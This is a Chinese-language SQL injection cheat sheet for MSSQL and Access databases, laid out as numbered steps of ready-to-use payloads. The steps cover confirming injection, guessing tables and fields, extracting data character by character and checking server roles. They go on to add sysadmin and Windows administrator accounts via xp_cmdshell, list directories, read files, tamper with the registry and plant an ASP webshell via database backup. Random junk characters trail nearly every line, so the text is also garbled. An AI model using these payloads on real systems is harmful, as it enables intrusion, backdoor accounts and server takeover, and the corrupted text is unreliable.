1.判断是否有注入;and 1=1 ;and 1=2 .N8AkQ(Ok
2.初步判断是否是mssql ;and user>0 mHo}, |
(bi}?V*
3.注入参数是字符'and [查询条件] and ''=' F_=RY]
G}CzeLw
4.搜索时没过滤参数的'and [查询条件] and '%25'=' _*1/4^
l;:
L0(('
5.判断数据库系统 etj8M
y6=
U7.3`qd"
;and (select count(*) from sysobjects)>0 mssql !CROc}
[y|"iSD
;and (select count(*) from msysobjects)>0 access |jV>
0&Q-y&$7
L5E.`^?
_h!OGLec
6.猜数据库 ;and (select Count(*) from [数据库名])>0 bE.,)GY
u~\u8X3
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 j^T.7Zv
jpZ, $
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ~`c?&YixU
Ln0rm9FV-
9.(1)猜字段的ascii值(access) |ul25/B
B
);V6YE
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 {,tEe'H7
*SQ hXTn
(2)猜字段的ascii值(mssql) Cfu]umZLn
/=A?O\B7
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Qx|m{1~-
C3Q[L}X\
10.测试权限结构(mssql) `me2Q
r k;k:<c
^AK<]r<?L?
zE5%l`@|o
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 9(DS"fgC
$-m@cObw!.
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- \];0S4SBy
V #W,}+_Sz
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- _eM\ /(v[
z9pv|
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- blNJ
)#zc$D^U
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- cS/\&%7u
x2/\%!mt
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- a}ogNx
&U ]L@]x
;and 1=(select IS_MEMBER('db_owner'));-- xtYX}u
fEE[huG
DcA{E8Y
*,X;4?:,
11.添加mssql和系统的帐户 jIwz
G+)$P
0P^RciC f
;exec master.dbo.sp_addlogin username;-- (:Rj:8{
;exec master.dbo.sp_password null,username,password;-- AJt*48H*G
:@{(^}N8u
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- JsI`#
m07=
_4
;exec master.dbo.xp_cmdshell 'net user username password yKF"\^`@
Yo3my>N&g
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Cqy84!Z<
C-lv=FJEk/
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Ahk6{uz
Y3+DTR0|'
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- F|3Te?_
8R"c}87
hRTw8-wy:
nI.K|hU:P
12.(1)遍历目录 -/rP0h5#
S0\QZ/je
;create table dirs(paths varchar(100), id int) 42E]&=Cet
~kPHf_B;z
;insert dirs exec master.dbo.xp_dirtree 'c:\' LgXc}3
[E<NEl*
;and (select top 1 paths from dirs)>0 z ^t6VF M
$Y* d ' >
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) TELN4*
=i[ _C>U
/ r6^]grg
dPZrX{ c
(2)遍历目录 =vJ:R[Ilw
? cU9~=
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 5<ZE.'O
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ci*rem
=p~k5k4
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 jez=q
OQ>8Q`
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 j<|I@0
K",YAfJa
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 OZ>w.$ue
1;8=,&
Aiyx!Q6vT
%;ST7
13.mssql中的存储过程 *|WS,
?5'E P|<
xp_regenumvalues 注册表根键, 子键 0?c2=Y
<&JK5$l<X
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 &w15GO;4
KA~eOEjM
xp_regread 根键,子键,键值名 oA/[>\y
2tPW1"M.n
;exec xp_regread i/UDda"E
2kukQj(n
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 K9-;-{qb
DzZEn]+zt
xp_regwrite 根键,子键, 值名, 值类型, 值 |q|?y`X4/
Vx'82CIC
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ctg U
|w; hu]
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 rgq~lZ.U4K
T0HNld
xp_regdeletevalue 根键,子键,值名 H(|n,c
SXqWq
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 aMv?D(Meb
~l {*XM
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 T'i^yd}*v
'%Fg+cZN\
{"v~1W)
h2S!<
14.mssql的backup创建webshell ,gO}H)v]t
rgo#mTQ_
use model E5;6ks)
\_vjc]?
create table cmd(str image); IvZ,|R?
q\DN8IJ
insert into cmd(str) values (''); 1>yh`Bp\=
8'sT zB]
backup database model to disk='c:\l.asp'; ,|}}Ml
^uiQZ%;
{{:QtkN
lwSZpS
15.mssql内置函数 6
4,('+
EjA3hHJ
;and (select @@version)>0 获得Windows的版本号 APgjT';P^
02$d
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ayGcc`
/nq\*)S#&
;and (select user_name())>0 爆当前系统的连接用户 WWEZTFL:j
!-veL1r
;and (select db_name())>0 得到当前连接的数据库 .IU\wN
Iwx~kvz\_(
w!%"b03q
?W 6
:$
16.简洁的webshell (- D^_*f
|LLDaA-=0
use model Te6cw+6
h}y]Pt?
create table cmd(str image); ~dBx<
h`n)
b
insert into cmd(str) values (''); 5i@WBa
!AXt6z cZ
backup database model to disk='g:\wwwtest\l.asp';